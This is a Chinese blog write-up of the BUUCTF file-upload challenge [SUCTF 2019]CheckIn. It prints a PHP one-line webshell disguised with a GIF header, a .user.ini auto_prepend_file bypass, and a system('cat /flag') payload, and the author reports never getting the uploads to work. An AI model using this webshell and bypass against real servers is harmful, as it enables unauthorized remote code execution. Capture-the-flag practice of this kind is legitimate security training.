106,【6】 buuctf web [SUCTF 2019]CheckIn

进入靶场

文件上传

老规矩,桌面有啥传啥

过滤了<?

寻找不含<?的一句话木马

文件名

123(2).php.jpg

文件内容

GIF89a?

<script language="php">eval($_GET['123']);</script>

123即密码,可凭借个人喜好更换

再上传一个文件将jpg文件变成php文件执行

这里用到.htaccess发现不行

尝试.user.ini

文件名

123(3).user.ini

文件内容

GIF89a

auto_prepend_file=123(3).php.jpg

文件名

123(3).php.jpg

文件内容

GIF89a

<script language='php'>system('cat /flag');</script>

按理说该查看即可得到flag了

但查看时为空

看看是哪步出了问题

没有上传成功

修改文件名,还是上传不成功

摧毁靶机,重试

要么url中81就不见了,像上图

要么返回上传页面

还发现不管上传什么路径都不变,尝试上传下面这张图片,还是那个路径,不是,路径变都不变,还是没上传成功,访问不到,这只是一个中规中矩的图片

尝试修改文件那么多遍,合着题目有问题

我再最后改一次

再开启一次靶场

还是不行

净是些让人破防的题

想到见到了很多次状态码500,搜搜看什么意思

so???????????????????????????????

相关推荐
QQ 19226383 小时前
基于PLC的12000字多层升降自动化立体车库设计:西门子200与组态王程序组态查重30
xss
PyHaVolask3 天前
XSS跨站脚本攻击
前端·xss·web漏洞
夏小花花4 天前
<editor> 组件设置样式不生效问题
java·前端·vue.js·xss
漏洞文库-Web安全4 天前
CTFHub XSS通关:XSS-过滤关键词 - 教程
前端·安全·web安全·okhttp·网络安全·ctf·xss
kong@react4 天前
springbpoot项目,富文本,xss脚本攻击防护,jsoup
java·前端·spring boot·xss
网安老伯5 天前
什么是网络安全?网络安全包括哪几个方面?学完能做一名黑客吗?
linux·数据库·python·web安全·网络安全·php·xss
重生之我在番茄自学网安拯救世界5 天前
网络安全中级阶段学习笔记(四):XSS-Labs 前 10 关 通关命令and实战笔记
笔记·学习·网络安全·xss·xss-labs
拾柒SHY6 天前
XSS-Labs靶场通关
前端·web安全·xss
Mysticbinary6 天前
用隐式马尔科夫模型分类URI和检测XSS的流程
分类·xss·贝叶斯定理
小菜今天没吃饱6 天前
DVWA-XSS(stored)
前端·网络安全·xss·dvwa